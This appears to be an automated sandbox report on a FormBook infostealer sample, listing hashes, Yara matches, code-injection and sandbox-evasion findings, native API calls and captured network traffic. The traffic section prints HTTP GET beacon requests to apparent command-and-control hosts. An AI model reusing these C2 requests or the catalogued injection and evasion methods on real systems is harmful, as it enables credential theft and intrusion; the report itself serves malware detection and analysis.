Analysis Report PT300975-inv.exe

Overview

General Information

Sample Name: PT300975-inv.exe
Analysis ID: 323028
MD5: 025544a9014cf1667e8a1d4ff68da253
SHA1: 0123853e7960cdae4f3ad95945b4ec86adbb93c6
SHA256: 2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
Tags: exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: PT300975-inv.exe ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.mscorsvw.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_02DEE404
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_02DEEEB0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEEEB0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_02DEF1D0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEF1D0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 0_2_02DEE9CC
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-20h] 0_2_02DEEEA4
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEEEA4
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then xor edx, edx 0_2_02DEF0FC
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then push dword ptr [ebp-24h] 0_2_02DEF1C9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh 0_2_02DEF1C9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 0_2_02DE91F1
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then xor edx, edx 0_2_02DEF108
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then mov ecx, dword ptr [0401E69Ch] 0_2_02DE7EA0
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 0_2_02DE7EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416BF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00416C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 4x nop then pop edi 2_2_00417D68
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6BF3
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C3F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A6C27
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 4_2_009A7D68

Networking:

barindex
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1Host: www.solidconstruct.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1Host: www.asacal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1Host: www.solidconstruct.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1Host: www.asacal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: g.msn.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: PT300975-inv.exe, 00000000.00000002.345062804.00000000013BB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large array initializations
Source: PT300975-inv.exe, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Source: 0.2.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Source: 0.0.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.cs Large array initialization: d!3: array initializer size 91136
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419D60 NtCreateFile, 2_2_00419D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E10 NtReadFile, 2_2_00419E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E90 NtClose, 2_2_00419E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419D5D NtCreateFile, 2_2_00419D5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E0B NtReadFile, 2_2_00419E0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_00419E8A NtClose, 2_2_00419E8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729540 NtReadFile,LdrInitializeThunk, 2_2_05729540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057295D0 NtClose,LdrInitializeThunk, 2_2_057295D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729710 NtQueryInformationToken,LdrInitializeThunk, 2_2_05729710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057297A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_057297A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729780 NtMapViewOfSection,LdrInitializeThunk, 2_2_05729780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057296E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_057296E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_05729910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057299A0 NtCreateSection,LdrInitializeThunk, 2_2_057299A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_05729860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729840 NtDelayExecution,LdrInitializeThunk, 2_2_05729840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A50 NtCreateFile,LdrInitializeThunk, 2_2_05729A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A20 NtResumeThread,LdrInitializeThunk, 2_2_05729A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729560 NtWriteFile, 2_2_05729560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572AD30 NtSetContextThread, 2_2_0572AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729520 NtWaitForSingleObject, 2_2_05729520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057295F0 NtQueryInformationFile, 2_2_057295F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729770 NtSetInformationFile, 2_2_05729770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A770 NtOpenThread, 2_2_0572A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729760 NtOpenProcess, 2_2_05729760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729730 NtQueryVirtualMemory, 2_2_05729730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A710 NtOpenProcessToken, 2_2_0572A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729FE0 NtCreateMutant, 2_2_05729FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729670 NtQueryInformationProcess, 2_2_05729670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729660 NtAllocateVirtualMemory, 2_2_05729660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729650 NtQueryValueKey, 2_2_05729650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729610 NtEnumerateValueKey, 2_2_05729610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057296D0 NtCreateKey, 2_2_057296D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729950 NtQueueApcThread, 2_2_05729950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057299D0 NtCreateProcessEx, 2_2_057299D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572B040 NtSuspendThread, 2_2_0572B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729820 NtEnumerateKey, 2_2_05729820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057298F0 NtReadVirtualMemory, 2_2_057298F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_057298A0 NtWriteVirtualMemory, 2_2_057298A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729B00 NtSetValueKey, 2_2_05729B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_0572A3B0 NtGetContextThread, 2_2_0572A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A10 NtQuerySection, 2_2_05729A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A00 NtProtectVirtualMemory, 2_2_05729A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe Code function: 2_2_05729A80 NtOpenDirectoryObject, 2_2_05729A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A50 NtCreateFile,LdrInitializeThunk, 4_2_034A9A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_034A9910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A99A0 NtCreateSection,LdrInitializeThunk, 4_2_034A99A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9840 NtDelayExecution,LdrInitializeThunk, 4_2_034A9840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_034A9860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_034A9710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_034A9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_034A9780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A96D0 NtCreateKey,LdrInitializeThunk, 4_2_034A96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_034A96E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9540 NtReadFile,LdrInitializeThunk, 4_2_034A9540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A95D0 NtClose,LdrInitializeThunk, 4_2_034A95D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9B00 NtSetValueKey, 4_2_034A9B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA3B0 NtGetContextThread, 4_2_034AA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A00 NtProtectVirtualMemory, 4_2_034A9A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A10 NtQuerySection, 4_2_034A9A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A20 NtResumeThread, 4_2_034A9A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9A80 NtOpenDirectoryObject, 4_2_034A9A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9950 NtQueueApcThread, 4_2_034A9950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A99D0 NtCreateProcessEx, 4_2_034A99D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AB040 NtSuspendThread, 4_2_034AB040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9820 NtEnumerateKey, 4_2_034A9820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A98F0 NtReadVirtualMemory, 4_2_034A98F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A98A0 NtWriteVirtualMemory, 4_2_034A98A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9760 NtOpenProcess, 4_2_034A9760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA770 NtOpenThread, 4_2_034AA770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9770 NtSetInformationFile, 4_2_034A9770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AA710 NtOpenProcessToken, 4_2_034AA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9730 NtQueryVirtualMemory, 4_2_034A9730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A97A0 NtUnmapViewOfSection, 4_2_034A97A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9650 NtQueryValueKey, 4_2_034A9650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9660 NtAllocateVirtualMemory, 4_2_034A9660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9670 NtQueryInformationProcess, 4_2_034A9670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9610 NtEnumerateValueKey, 4_2_034A9610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9560 NtWriteFile, 4_2_034A9560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A9520 NtWaitForSingleObject, 4_2_034A9520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034AAD30 NtSetContextThread, 4_2_034AAD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_034A95F0 NtQueryInformationFile, 4_2_034A95F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9D60 NtCreateFile, 4_2_009A9D60
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E90 NtClose, 4_2_009A9E90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E10 NtReadFile, 4_2_009A9E10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9D5D NtCreateFile, 4_2_009A9D5D
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E8A NtClose, 4_2_009A9E8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4_2_009A9E0B NtReadFile, 4_2_009A9E0B
Detected potential crypto function
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_00C70392 0_2_00C70392
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_00C6E5D9 0_2_00C6E5D9
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE4340 0_2_02DE4340
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE2520 0_2_02DE2520
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE3018 0_2_02DE3018
Source: C:\Users\user\Desktop\PT300975-inv.exe Code function: 0_2_02DE5E00 0_2_02DE5E00
